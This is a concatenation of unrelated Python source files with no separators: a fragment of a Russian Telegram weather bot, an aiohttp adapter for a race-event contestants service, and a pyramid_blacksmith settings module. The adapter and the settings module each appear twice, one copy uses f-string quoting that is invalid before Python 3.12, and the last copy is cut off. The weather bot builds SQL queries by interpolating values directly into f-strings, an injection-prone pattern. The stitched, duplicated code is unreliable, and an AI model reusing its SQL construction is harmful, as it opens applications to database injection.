{get_weather_emoji(condition[i].text)}' + '\n\n' for i in range(2, 12) ] return ( f'{sub_reg}' f'\n<i>({region})</i>' '\nПрогноз на 10 дней\n' f'{update}\n' f'{"".join(mes)}' ) def set_urls(url, value, chat_id): with UseDataBase(config) as cursor: operation = f""" UPDATE users_property SET {url} = '{value}' WHERE chat_id = {chat_id}; """ cursor.execute(operation) def get_urls(url, chat_id): with UseDataBase(config) as cursor: operation = f""" SELECT {url} FROM users_property WHERE chat_id = {chat_id}; """ cursor.execute(operation) result = cursor.fetchall() return result[0][0] def alphabet(url, choosing_region): alphabet = scraping(url) alphabet = alphabet.find_all( 'h2', 'title title_level_2 place-list__letter' ) alphabet = [i.get_text() for i in alphabet] keyboard = keyboard_rows(alphabet, choosing_region) return keyboard def keyboard_rows(data, choosing_region): keyboard = telebot.types.InlineKeyboardMarkup(row_width=4) lst = [ telebot.types.InlineKeyboardButton( data[btn], callback_data=f'{choosing_region + data[btn]}' ) for btn in range(len(data)) ] keyboard.add(*lst) return keyboard def set_region(letter, url): regions = get_location(url) regions = [ (region, regions[region]) for region in regions.keys() if region.startswith(letter) ] return regions def get_location(url): soup = scraping(url) soup = soup.find_all( 'li', 'place-list__item place-list__item_region_yes' ) names = [name.get_text() for name in soup] links = [ 'https://yandex.ru' + link.find('a').get('href') for link in soup ] regions = dict(zip(names, links)) return regions def time_zone(tz): tz = int(tz.split('+')[1][:2]) - 3 if tz > 0: tz = '+' + str(tz) elif tz == 0: tz = '' else: tz = '-' + str(tz) return tz def button(text: str, url: str = None, callback_data: str = None, switch_inline_query: str = None): keyboard = telebot.types.InlineKeyboardMarkup() first_btn = telebot.types.InlineKeyboardButton( text, url, callback_data ) if switch_inline_query: keyboard.row( first_btn, telebot.types.InlineKeyboardButton( text='Поделиться', switch_inline_query=switch_inline_query ) ) else: keyboard.add(first_btn) return keyboard def get_weather_emoji(value, hour=None): value = value.lower() try: if hour is not None: # яндекс считает ночным временем с 0 ч. по 6 ч. if isinstance(hour, str): if hour == 'ночью': hour = 3 # для удобства получения emoji выбрано это время if isinstance(hour, int): if hour < 6: return weather_conditions_night[value] return weather_conditions[value] except KeyError as err: with open('report_emoji.txt', 'a') as file: print(f'KeyError get_weather_emoji: {err}', file=file) return '' @bot.inline_handler(func=lambda query: True) def inline_mode(inline_query): current = telebot.types.InlineQueryResultArticle( '1', 'Current', telebot.types.InputTextMessageContent( set_message( get_urls( 'url', inline_query.from_user.id ) ) ), reply_markup=button( text='Обновить', callback_data='update_current', switch_inline_query='Current' ), description='Погода сейчас', thumb_url=( 'https://www.clipartkey.com/mpngs/m/273-2739384_weather' '-icon-heart.png' ) ) ten_day = telebot.types.InlineQueryResultArticle( '3', '10 day', telebot.types.InputTextMessageContent( set_message_10_day( get_urls( 'url', inline_query.from_user.id ) ) ), reply_markup=button( text='Обновить', callback_data='update_10_day', switch_inline_query='10 day' ), description='Прогноз на 10 дней', thumb_url=( 'https://unblast.com/wp-content/uploads/2020/05/Weather-' 'Vector-Icons-1536x1152.jpg' ) ) today = telebot.types.InlineQueryResultArticle( '2', 'Today', telebot.types.InputTextMessageContent( set_today_message( get_urls( 'url', inline_query.from_user.id ) ) ), reply_markup=button( text='Обновить', callback_data='update_today', switch_inline_query='Today' ), description='Прогноз на сегодня', thumb_url=( 'https://www.clipartkey.com/mpngs/m/273-2739384_weather' '-icon-heart.png' ) ) bot.answer_inline_query( inline_query.id, [current, today, ten_day] ) if __name__ == '__main__': bot.polling(none_stop=True)
"""Module for contestants adapter.""" import copy import logging import os from typing import List from aiohttp import ClientSession from aiohttp import hdrs, web from multidict import MultiDict from .raceclasses_adapter import RaceclassesAdapter EVENTS_HOST_SERVER = os.getenv("EVENTS_HOST_SERVER", "localhost") EVENTS_HOST_PORT = os.getenv("EVENTS_HOST_PORT", "8082") EVENT_SERVICE_URL = f"http://{EVENTS_HOST_SERVER}:{EVENTS_HOST_PORT}" class ContestantsAdapter: """Class representing contestants.""" async def assign_bibs(self, token: str, event_id: str) -> str: """Generate bibs based upon registrations.""" headers = MultiDict([(hdrs.AUTHORIZATION, f"Bearer {token}")]) url = f"{EVENT_SERVICE_URL}/events/{event_id}/contestants/assign-bibs" async with ClientSession() as session: async with session.post(url, headers=headers) as resp: res = resp.status logging.debug(f"assign_bibs result - got response {resp}") if res == 201: pass else: servicename = "assign_bibs" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body["detail"]}." ) information = "Startnummer tildelt." return information async def create_contestant( self, token: str, event_id: str, request_body: dict ) -> str: """Create new contestant function.""" id = "" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) async with ClientSession() as session: async with session.post( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants", headers=headers, json=request_body, ) as resp: if resp.status == 201: logging.debug(f"result - got response {resp}") location = resp.headers[hdrs.LOCATION] id = location.split(os.path.sep)[-1] else: servicename = "create_contestant" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body["detail"]}." ) return id async def create_contestants(self, token: str, event_id: str, inputfile) -> str: """Create new contestants function.""" headers = { hdrs.CONTENT_TYPE: "text/csv", hdrs.AUTHORIZATION: f"Bearer {token}", } logging.debug(f"Create contestants - got file {inputfile}") async with ClientSession() as session: async with session.post( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants", headers=headers, data=inputfile, ) as resp: res = resp.status logging.info(f"result - got response {res} - {resp}") if res == 200: res = await resp.json() else: servicename = "create_contestants" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body["detail"]}." ) return str(res) async def delete_all_contestants(self, token: str, event_id: str) -> str: """Delete all contestants in one event function.""" headers = { hdrs.AUTHORIZATION: f"Bearer {token}", } async with ClientSession() as session: async with session.delete( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants", headers=headers, ) as resp: res = resp.status logging.debug(f"delete all result - got response {resp}") if res == 204: pass else: servicename = "delete_all_contestants" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body["detail"]}." ) return str(res) async def delete_contestant( self, token: str, event_id: str, contestant_id: str ) -> str: """Delete one contestant function.""" headers = { hdrs.AUTHORIZATION: f"Bearer {token}", } async with ClientSession() as session: async with session.delete( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants/{contestant_id}", headers=headers, ) as resp: res = resp.status logging.debug(f"delete result - got response {resp}") if res == 204: pass else: servicename = "delete_contestant" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body["detail"]}." ) return str(res) async def get_all_contestants_by_ageclass( self, token: str, event_id: str, ageclass_name: str ) -> List: """Get all contestants / by class (optional) function.""" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) contestants = [] async with ClientSession() as session: async with session.get( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants", headers=headers ) as resp: logging.debug(f"get_all_contestants - got response {resp.status}") if resp.status == 200: contestants = await resp.json() else: servicename = "get_all_contestants_by_ageclass" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body["detail"]}." ) # TODO: Bør flyttes til backend if ageclass_name != "": tmp_contestants = [] for x in contestants: if x["ageclass"] == ageclass_name: tmp_contestants.append(x) contestants = tmp_contestants return contestants async def get_all_contestants_by_raceclass( self, token: str, event_id: str, raceclass_name: str ) -> List: """Get all contestants / by class function.""" ageclasses = [] raceclasses = await RaceclassesAdapter().get_raceclasses(token, event_id) for raceclass in raceclasses: if raceclass["name"] == raceclass_name: ageclasses.append(raceclass["ageclass_name"]) headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) contestants = [] async with ClientSession() as session: async with session.get( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants", headers=headers ) as resp: logging.debug(f"get_all_contestants - got response {resp.status}") if resp.status == 200: contestants = await resp.json() else: servicename = "get_all_contestants_by_ageclass" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body["detail"]}." ) # TODO: Bør flyttes til backend tmp_contestants = [] for x in contestants: if x["ageclass"] in ageclasses: tmp_contestants.append(x) contestants = tmp_contestants return contestants async def get_contestant_by_bib(self, token: str, event_id: str, bib: str) -> dict: """Get contestant by bib function.""" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) contestant = [] async with ClientSession() as session: async with session.get( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants?bib={bib}", headers=headers, ) as resp: logging.debug( f"get_contestants_by_raceclass - got response {resp.status}" ) if resp.status == 200: contestant = await resp.json() else: servicename = "get_contestants_by_bib" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body["detail"]}." ) if len(contestant) == 0: return {} return contestant[0] async def get_contestants_by_raceclass( self, token: str, event_id: str, raceclass: str ) -> List: """Get all contestants by raceclass function.""" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) contestants = [] async with ClientSession() as session: async with session.get( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants?raceclass={raceclass}", headers=headers, ) as resp: logging.debug( f"get_contestants_by_raceclass - got response {resp.status}" ) if resp.status == 200: contestants = await resp.json() else: servicename = "get_contestants_by_raceclass" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body["detail"]}." ) return contestants async def get_contestant( self, token: str, event_id: str, contestant_id: str ) -> dict: """Get all contestant function.""" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) contestant = {} async with ClientSession() as session: async with session.get( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants/{contestant_id}", headers=headers, ) as resp: logging.debug(f"get_contestant - got response {resp.status}") if resp.status == 200: contestant = await resp.json() else: servicename = "get_contestant" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body["detail"]}." ) return contestant async def update_contestant( self, token: str, event_id: str, contestant: dict ) -> str: """Create new contestants function.""" request_body = copy.deepcopy(contestant) logging.debug(f"update_contestants, got request_body {request_body}") url = f"{EVENT_SERVICE_URL}/events/{event_id}/contestants/{contestant["id"]}" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) async with ClientSession() as session: async with session.put(url, headers=headers, json=request_body) as resp: res = resp.status if res == 204: logging.debug(f"result - got response {resp}") else: servicename = "update_contestant" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body["detail"]}." ) return str(resp.status)
"""Module for contestants adapter.""" import copy import logging import os from typing import List from aiohttp import ClientSession from aiohttp import hdrs, web from multidict import MultiDict from .raceclasses_adapter import RaceclassesAdapter EVENTS_HOST_SERVER = os.getenv("EVENTS_HOST_SERVER", "localhost") EVENTS_HOST_PORT = os.getenv("EVENTS_HOST_PORT", "8082") EVENT_SERVICE_URL = f"http://{EVENTS_HOST_SERVER}:{EVENTS_HOST_PORT}" class ContestantsAdapter: """Class representing contestants.""" async def assign_bibs(self, token: str, event_id: str) -> str: """Generate bibs based upon registrations.""" headers = MultiDict([(hdrs.AUTHORIZATION, f"Bearer {token}")]) url = f"{EVENT_SERVICE_URL}/events/{event_id}/contestants/assign-bibs" async with ClientSession() as session: async with session.post(url, headers=headers) as resp: res = resp.status logging.debug(f"assign_bibs result - got response {resp}") if res == 201: pass else: servicename = "assign_bibs" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body['detail']}." ) information = "Startnummer tildelt." return information async def create_contestant( self, token: str, event_id: str, request_body: dict ) -> str: """Create new contestant function.""" id = "" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) async with ClientSession() as session: async with session.post( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants", headers=headers, json=request_body, ) as resp: if resp.status == 201: logging.debug(f"result - got response {resp}") location = resp.headers[hdrs.LOCATION] id = location.split(os.path.sep)[-1] else: servicename = "create_contestant" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body['detail']}." ) return id async def create_contestants(self, token: str, event_id: str, inputfile) -> str: """Create new contestants function.""" headers = { hdrs.CONTENT_TYPE: "text/csv", hdrs.AUTHORIZATION: f"Bearer {token}", } logging.debug(f"Create contestants - got file {inputfile}") async with ClientSession() as session: async with session.post( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants", headers=headers, data=inputfile, ) as resp: res = resp.status logging.info(f"result - got response {res} - {resp}") if res == 200: res = await resp.json() else: servicename = "create_contestants" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body['detail']}." ) return str(res) async def delete_all_contestants(self, token: str, event_id: str) -> str: """Delete all contestants in one event function.""" headers = { hdrs.AUTHORIZATION: f"Bearer {token}", } async with ClientSession() as session: async with session.delete( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants", headers=headers, ) as resp: res = resp.status logging.debug(f"delete all result - got response {resp}") if res == 204: pass else: servicename = "delete_all_contestants" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body['detail']}." ) return str(res) async def delete_contestant( self, token: str, event_id: str, contestant_id: str ) -> str: """Delete one contestant function.""" headers = { hdrs.AUTHORIZATION: f"Bearer {token}", } async with ClientSession() as session: async with session.delete( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants/{contestant_id}", headers=headers, ) as resp: res = resp.status logging.debug(f"delete result - got response {resp}") if res == 204: pass else: servicename = "delete_contestant" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body['detail']}." ) return str(res) async def get_all_contestants_by_ageclass( self, token: str, event_id: str, ageclass_name: str ) -> List: """Get all contestants / by class (optional) function.""" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) contestants = [] async with ClientSession() as session: async with session.get( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants", headers=headers ) as resp: logging.debug(f"get_all_contestants - got response {resp.status}") if resp.status == 200: contestants = await resp.json() else: servicename = "get_all_contestants_by_ageclass" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body['detail']}." ) # TODO: Bør flyttes til backend if ageclass_name != "": tmp_contestants = [] for x in contestants: if x["ageclass"] == ageclass_name: tmp_contestants.append(x) contestants = tmp_contestants return contestants async def get_all_contestants_by_raceclass( self, token: str, event_id: str, raceclass_name: str ) -> List: """Get all contestants / by class function.""" ageclasses = [] raceclasses = await RaceclassesAdapter().get_raceclasses(token, event_id) for raceclass in raceclasses: if raceclass["name"] == raceclass_name: ageclasses.append(raceclass["ageclass_name"]) headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) contestants = [] async with ClientSession() as session: async with session.get( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants", headers=headers ) as resp: logging.debug(f"get_all_contestants - got response {resp.status}") if resp.status == 200: contestants = await resp.json() else: servicename = "get_all_contestants_by_ageclass" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body['detail']}." ) # TODO: Bør flyttes til backend tmp_contestants = [] for x in contestants: if x["ageclass"] in ageclasses: tmp_contestants.append(x) contestants = tmp_contestants return contestants async def get_contestant_by_bib(self, token: str, event_id: str, bib: str) -> dict: """Get contestant by bib function.""" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) contestant = [] async with ClientSession() as session: async with session.get( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants?bib={bib}", headers=headers, ) as resp: logging.debug( f"get_contestants_by_raceclass - got response {resp.status}" ) if resp.status == 200: contestant = await resp.json() else: servicename = "get_contestants_by_bib" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body['detail']}." ) if len(contestant) == 0: return {} return contestant[0] async def get_contestants_by_raceclass( self, token: str, event_id: str, raceclass: str ) -> List: """Get all contestants by raceclass function.""" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) contestants = [] async with ClientSession() as session: async with session.get( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants?raceclass={raceclass}", headers=headers, ) as resp: logging.debug( f"get_contestants_by_raceclass - got response {resp.status}" ) if resp.status == 200: contestants = await resp.json() else: servicename = "get_contestants_by_raceclass" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body['detail']}." ) return contestants async def get_contestant( self, token: str, event_id: str, contestant_id: str ) -> dict: """Get all contestant function.""" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) contestant = {} async with ClientSession() as session: async with session.get( f"{EVENT_SERVICE_URL}/events/{event_id}/contestants/{contestant_id}", headers=headers, ) as resp: logging.debug(f"get_contestant - got response {resp.status}") if resp.status == 200: contestant = await resp.json() else: servicename = "get_contestant" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body['detail']}." ) return contestant async def update_contestant( self, token: str, event_id: str, contestant: dict ) -> str: """Create new contestants function.""" request_body = copy.deepcopy(contestant) logging.debug(f"update_contestants, got request_body {request_body}") url = f"{EVENT_SERVICE_URL}/events/{event_id}/contestants/{contestant['id']}" headers = MultiDict( [ (hdrs.CONTENT_TYPE, "application/json"), (hdrs.AUTHORIZATION, f"Bearer {token}"), ] ) async with ClientSession() as session: async with session.put(url, headers=headers, json=request_body) as resp: res = resp.status if res == 204: logging.debug(f"result - got response {resp}") else: servicename = "update_contestant" body = await resp.json() logging.error(f"{servicename} failed - {resp.status} - {body}") raise web.HTTPBadRequest( reason=f"Error - {resp.status}: {body['detail']}." ) return str(resp.status)
from typing import Any, Callable, Dict, Iterator, List, Optional, Type, cast import blacksmith from blacksmith import ( CollectionParser, HTTPTimeout, PrometheusMetrics, SyncAbstractServiceDiscovery, SyncAbstractTransport, SyncClient, SyncClientFactory, SyncConsulDiscovery, SyncHTTPMiddleware, SyncRouterDiscovery, SyncStaticDiscovery, ) from blacksmith.typing import Proxies, Service, Url from pyramid.config import Configurator # type: ignore from pyramid.exceptions import ConfigurationError # type: ignore from pyramid.request import Request # type: ignore from pyramid.settings import asbool, aslist # type: ignore from pyramid_blacksmith.middleware_factory import AbstractMiddlewareFactoryBuilder from .typing import Settings from .utils import list_to_dict, resolve_entrypoint class SettingsBuilder: def __init__( self, settings: Settings, metrics: PrometheusMetrics, prefix: str = "client" ): self.settings = settings self.prefix = f"blacksmith.{prefix}" self.metrics = metrics class BlacksmithPrometheusMetricsBuilder: def __init__(self, settings: Settings): self.settings = settings self.prefix = "blacksmith.prometheus_buckets" def build(self) -> PrometheusMetrics: buckets_list = list_to_dict(self.settings, self.prefix) buckets: Dict[str, List[float]] = {} for key, vals in buckets_list.items(): buckets[key] = [float(val) for val in vals.split()] metrics = PrometheusMetrics(**buckets) return metrics class BlacksmithClientSettingsBuilder(SettingsBuilder): def build(self) -> SyncClientFactory[Any, Any]: sd = self.build_sd_strategy() timeout = self.get_timeout() proxies = self.get_proxies() verify = self.get_verify_certificate() transport = self.build_transport() collection_parser = self.build_collection_parser() ret: SyncClientFactory[Any, Any] = SyncClientFactory( sd, timeout=timeout, proxies=proxies, verify_certificate=verify, transport=transport, collection_parser=collection_parser, ) for mw in self.build_middlewares(self.metrics): ret.add_middleware(mw) return ret def build_sd_static(self) -> SyncStaticDiscovery: key = f"{self.prefix}.static_sd_config" services_endpoints = list_to_dict(self.settings, key) services: Dict[Service, Url] = {} for api_v, url in services_endpoints.items(): api, version = api_v.split("/", 1) if "/" in api_v else (api_v, None) services[(api or "", version)] = url return SyncStaticDiscovery(services) def build_sd_consul(self) -> SyncConsulDiscovery: key = f"{self.prefix}.consul_sd_config" kwargs = list_to_dict(self.settings, key) return SyncConsulDiscovery(**kwargs) # type: ignore def build_sd_router(self) -> SyncRouterDiscovery: key = f"{self.prefix}.router_sd_config" kwargs = list_to_dict(self.settings, key) return SyncRouterDiscovery(**kwargs) def build_sd_strategy(self) -> SyncAbstractServiceDiscovery: sd_classes: Dict[str, Callable[[], SyncAbstractServiceDiscovery]] = { "static": self.build_sd_static, "consul": self.build_sd_consul, "router": self.build_sd_router, } key = f"{self.prefix}.service_discovery" sd_name = self.settings.get(key) if not sd_name: raise ConfigurationError(f"Missing setting {key}") if sd_name not in sd_classes: raise ConfigurationError( f"Invalid value {sd_name} for {key}: " f"not in {", ".join(sd_classes.keys())}" ) return sd_classes[sd_name]() def get_timeout(self) -> HTTPTimeout: kwargs = {} for key in ( (f"{self.prefix}.read_timeout", "read"), (f"{self.prefix}.connect_timeout", "connect"), ): if key[0] in self.settings: kwargs[key[1]] = int(self.settings[key[0]]) return HTTPTimeout(**kwargs) def get_proxies(self) -> Optional[Proxies]: key = f"{self.prefix}.proxies" if key in self.settings: return cast(Proxies, list_to_dict(self.settings, key)) or None return None def get_verify_certificate(self) -> bool: return asbool(self.settings.get(f"{self.prefix}.verify_certificate", True)) def build_transport(self) -> Optional[SyncAbstractTransport]: value = self.settings.get(f"{self.prefix}.transport") if not value: return None if isinstance(value, SyncAbstractTransport): return value cls = resolve_entrypoint(value) return cls() def build_collection_parser(self) -> Type[CollectionParser]: value = self.settings.get(f"{self.prefix}.collection_parser") if not value: return CollectionParser if isinstance(value, type) and issubclass(value, CollectionParser): return value # type: ignore cls = resolve_entrypoint(value) return cls # type: ignore def build_middlewares( self, metrics: PrometheusMetrics ) -> Iterator[SyncHTTPMiddleware]: value = aslist( self.settings.get(f"{self.prefix}.middlewares", []), flatten=False ) classes = { "prometheus": "pyramid_blacksmith.middleware:PrometheusMetricsBuilder", "circuitbreaker": "pyramid_blacksmith.middleware:CircuitBreakerBuilder", "http_cache": "pyramid_blacksmith.middleware:HTTPCacheBuilder", } for middleware in value: try: middleware, cls = middleware.split(maxsplit=1) except ValueError: cls = classes.get(middleware, middleware) cls = resolve_entrypoint(cls) instance = cls( self.settings, f"{self.prefix}.middleware.{middleware}", metrics, ).build() yield instance class BlacksmithMiddlewareFactoryBuilder(SettingsBuilder): """ Parse the settings like: :: blacksmith.client.middleware_factories = forward_header blacksmith.client.middleware_factory.forward_header = Authorization """ def build(self) -> Iterator[AbstractMiddlewareFactoryBuilder]: classes = { "forward_header": ( "pyramid_blacksmith.middleware_factory:ForwardHeaderFactoryBuilder" ), } value = aslist( self.settings.get(f"{self.prefix}.middleware_factories", []), flatten=False ) for middleware in value: try: middleware, cls = middleware.split(maxsplit=1) except ValueError: cls = classes.get(middleware, middleware) key = f"{self.prefix}.middleware_factory.{middleware}" kwargs = list_to_dict(self.settings, key, with_flag=True) cls = resolve_entrypoint(cls) yield cls(**kwargs) class PyramidBlacksmith: """ Type of the `request.blacksmith` property. This can be used to create a ``Protocol`` of the pyramid ``Request`` in final application for typing purpose. Example: .. code-block:: from pyramid_blacksmith import PyramidBlacksmith class RequestProtocol(Protocol): blacksmith: PyramidBlacksmith def my_view(request: RequestProtocol): ... """ def __init__( self, request: Request, clients: Dict[str, SyncClientFactory[Any, Any]], middleware_factories: Dict[str, List[AbstractMiddlewareFactoryBuilder]], ): self.request = request self.clients = clients self.middleware_factories = middleware_factories def __getattr__(self, name: str) -> Callable[[str], SyncClient[Any, Any]]: """ Return the blacksmith client factory named in the configuration. """ def get_client(client_name: str) -> SyncClient[Any, Any]: try: client_factory = self.clients[name] except KeyError as k: raise AttributeError(f"Client {k} is not registered") cli = client_factory(client_name) for middleware_factory in self.middleware_factories.get(name, []): cli.add_middleware(middleware_factory(self.request)) return cli return get_client def blacksmith_binding_factory( config: Configurator, ) -> Callable[[Request], PyramidBlacksmith]: settings: Settings = config.registry.settings clients_key = aslist(settings.get("blacksmith.clients", ["client"])) metrics = BlacksmithPrometheusMetricsBuilder(settings).build() clients_dict = { key: BlacksmithClientSettingsBuilder(settings, metrics, key).build() for key in clients_key } middleware_factories = { key: list(BlacksmithMiddlewareFactoryBuilder(settings, metrics, key).build()) for key in clients_key } def blacksmith_binding(request: Request) -> PyramidBlacksmith: return PyramidBlacksmith(request, clients_dict, middleware_factories) return blacksmith_binding def includeme(config: Configurator): """ Expose the method consume by the Configurator while using: :: config.include('pyramid_blacksmith') This will inject the request property ``request.blacksmith`` like the pyramid view below: :: def my_view(request): api = request.blacksmith.client("api") ... """ resources = aslist(config.registry.settings.get("blacksmith.scan", [])) blacksmith.scan(*resources) config.add_request_method( callable=blacksmith_binding_factory(config), name="blacksmith", property=True, reify=False, )
from typing import Any, Callable, Dict, Iterator, List, Optional, Type, cast import blacksmith from blacksmith import ( CollectionParser, HTTPTimeout, PrometheusMetrics, SyncAbstractServiceDiscovery, SyncAbstractTransport, SyncClient, SyncClientFactory, SyncConsulDiscovery, SyncHTTPMiddleware, SyncRouterDiscovery, SyncStaticDiscovery, ) from blacksmith.typing import Proxies, Service, Url from pyramid.config import Configurator # type: ignore from pyramid.exceptions import ConfigurationError # type: ignore from pyramid.request import Request # type: ignore from pyramid.settings import asbool, aslist # type: ignore from pyramid_blacksmith.middleware_factory import AbstractMiddlewareFactoryBuilder from .typing import Settings from .utils import list_to_dict, resolve_entrypoint class SettingsBuilder: def __init__( self, settings: Settings, metrics: PrometheusMetrics, prefix: str = "client" ): self.settings = settings self.prefix = f"blacksmith.{prefix}" self.metrics = metrics class BlacksmithPrometheusMetricsBuilder: def __init__(self, settings: Settings): self.settings = settings self.prefix = "blacksmith.prometheus_buckets" def build(self) -> PrometheusMetrics: buckets_list = list_to_dict(self.settings, self.prefix) buckets: Dict[str, List[float]] = {} for key, vals in buckets_list.items(): buckets[key] = [float(val) for val in vals.split()] metrics = PrometheusMetrics(**buckets) return metrics class BlacksmithClientSettingsBuilder(SettingsBuilder): def build(self) -> SyncClientFactory[Any, Any]: sd = self.build_sd_strategy() timeout = self.get_timeout() proxies = self.get_proxies() verify = self.get_verify_certificate() transport = self.build_transport() collection_parser = self.build_collection_parser() ret: SyncClientFactory[Any, Any] = SyncClientFactory( sd, timeout=timeout, proxies=proxies, verify_certificate=verify, transport=transport, collection_parser=collection_parser, ) for mw in self.build_middlewares(self.metrics): ret.add_middleware(mw) return ret def build_sd_static(self) -> SyncStaticDiscovery: key = f"{self.prefix}.static_sd_config" services_endpoints = list_to_dict(self.settings, key) services: Dict[Service, Url] = {} for api_v, url in services_endpoints.items(): api, version = api_v.split("/", 1) if "/" in api_v else (api_v, None) services[(api or "", version)] = url return SyncStaticDiscovery(services) def build_sd_consul(self) -> SyncConsulDiscovery: key = f"{self.prefix}.consul_sd_config" kwargs = list_to_dict(self.settings, key) return SyncConsulDiscovery(**kwargs) # type: ignore def build_sd_router(self) -> SyncRouterDiscovery: key = f"{self.prefix}.router_sd_config" kwargs = list_to_dict(self.settings, key) return SyncRouterDiscovery(**kwargs) def build_sd_strategy(self) -> SyncAbstractServiceDiscovery: sd_classes: Dict[str, Callable[[], SyncAbstractServiceDiscovery]] = { "static": self.build_sd_static, "consul": self.build_sd_consul, "router": self.build_sd_router, } key = f"{self.prefix}.service_discovery" sd_name = self.settings.get(key) if not sd_name: raise ConfigurationError(f"Missing setting {key}") if sd_name not in sd_classes: raise ConfigurationError( f"Invalid value {sd_name} for {key}: " f"not in {', '.join(sd_classes.keys())}" ) return sd_classes[sd_name]() def get_timeout(self) -> HTTPTimeout: kwargs = {} for key in ( (f"{self.prefix}.read_timeout", "read"), (f"{self.prefix}.connect_timeout", "connect"), ): if key[0] in self.settings: kwargs[key[1]] = int(self.settings[key[0]]) return HTTPTimeout(**kwargs) def get_proxies(self) -> Optional[Proxies]: key = f"{self.prefix}.proxies" if key in self.settings: return cast(Proxies, list_to_dict(self.settings, key)) or None return None def get_verify_certificate(self) -> bool: return asbool(self.settings.get(f"{self.prefix}.verify_certificate", True)) def build_transport(self) -> Optional[SyncAbstractTransport]: value = self.settings.get(f"{self.prefix}.transport") if not value: return None if isinstance(value, SyncAbstractTransport): return value cls = resolve_entrypoint(value) return cls() def build_collection_parser(self) -> Type[CollectionParser]: value = self.settings.get(f"{self.prefix}.collection_parser") if not value: return CollectionParser if isinstance(value, type) and issubclass(value, CollectionParser): return value # type: ignore cls = resolve_entrypoint(value) return cls # type: ignore def build_middlewares( self, metrics: PrometheusMetrics ) -> 